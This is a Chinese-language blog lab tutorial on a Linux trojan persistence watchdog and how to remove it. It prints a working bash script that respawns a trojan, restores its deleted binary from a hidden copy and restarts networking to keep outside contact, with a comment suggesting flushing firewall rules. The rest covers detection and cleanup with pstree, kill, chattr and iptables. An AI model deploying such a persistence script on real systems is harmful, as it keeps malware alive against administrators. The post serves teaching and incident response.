Linux木马-木马父进程实时监控木马(二)

2022年10月24日13:29:43 发表评论 71 views

1.1 实验环境

序号 主机IP 主机系统 主机角色
1 192.168.10.180 Kali 攻击机
2 192.168.10.80 Centos 7.9 64位 被攻击机

1.2 生成木马父进程

1.2.1 木马父进程作用

生成木马的父进程,自动检测子进程,如果子进程被删除,父进程可以自动启动子进程,这就是Linux删除木马后木马自动又生成的原因。

1.2.2 编写木马父进程脚本

[[email protected] ~]# cp /usr/bin/muma /usr/wke
[[email protected] ~]# vim /bin/workstat
#!/bin/bash
while true
do
  a=`pgrep muma|wc -l`      # 统计当前系统运行了几个木马进程
# 如查木马进程数小于等于1,那么再启动一个子进程,这样可以保障最少有两个木马子进程在运行
  if [ $a -le 1 ];then
    /bin/cp /usr/wke /usr/bin/muma  # 防止子进程文件被删除
    /usr/bin/muma &
    # 防止管理员关闭外网,让木马主动启动网络和外面联系,也可以加上清空防火墙规则的命令
    service network restart
  fi
done
[[email protected] ~]# chmod +x /bin/workstat
[[email protected] ~]# /bin/workstat &

1.3 删除木马父进程

排查思路:需要先找到木马的父进程,把父进程删除,再把病毒的原体删除:

[[email protected] ~]# yum install -y psmisc
[[email protected] ~]# pstree | grep muma
        |-network---muma---sleep    # 查看父进程路径
        `-workstat-+-muma---sleep
[[email protected] ~]# ps -ef|grep workstat
root     19276     1  0 16:52          00:00:00 /bin/bash /bin/workstat
root     19717 19020  0 16:53 pts/0    00:00:00 grep --color=auto workstat
[[email protected] ~]# vim /bin/workstat        # 可以查看一下父进程内容
[[email protected] ~]# kill 19276
[[email protected] ~]# rm -f /bin/workstat  # 删除父进程
[[email protected] ~]# ps -ef|grep muma
root     19281     1  0 16:52          00:00:00 /bin/bash /usr/bin/muma
root     19307 19304  0 16:52          00:00:00 /bin/bash /usr/bin/muma
root     19928 19020  0 16:54 pts/0    00:00:00 grep --color=auto muma
[[email protected] ~]# kill 19281
[[email protected] ~]# kill 19307      
[[email protected] ~]# rm -f /usr/wke   # 删除父进程中调用的病原体

1.4 仅停止木马进程而不杀死

[[email protected] ~]# ps -ef|grep muma
root     20134 19020  0 17:02 pts/0    00:00:00 /bin/bash /usr/bin/muma
root     20151 19020  0 17:03 pts/0    00:00:00 grep --color=auto muma
[[email protected] ~]# top -p 20134 # S表示是sleep ,R表示正在运行,T表示停止
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
20134 root      20   0  113284   1392   1200 S   0.0  0.0   0:00.04 muma
# 让进程停止运行而不是杀掉,直接杀死进程会再产生新进程。这里把进程停止,让进程不在发挥攻击作用,然后再慢慢排查
[[email protected] ~]# kill -STOP 20134
[[email protected] ~]# top -p 20134
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
20134 root      20   0  113284   1396   1200 T   0.0  0.0   0:00.08 muma
[[email protected] ~]# pkill workstat
[[email protected] ~]# pkill muma

1.5 停止顽固木马执行

如果工作中发现某个木马程序不停的运行,可以利用扩展属性让木马程序没有可执行权限:

[[email protected] ~]# chmod 0000 /usr/bin/muma && chattr +i /usr/bin/muma

1.6 禁止服务器访问外网

[[email protected] ~]# systemctl start iptables
[[email protected] ~]# iptables -t filter -A OUTPUT -m state --state NEW -j DROP
[[email protected] ~]# ping www.baidu.com
ping: www.baidu.com: Name or service not known

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang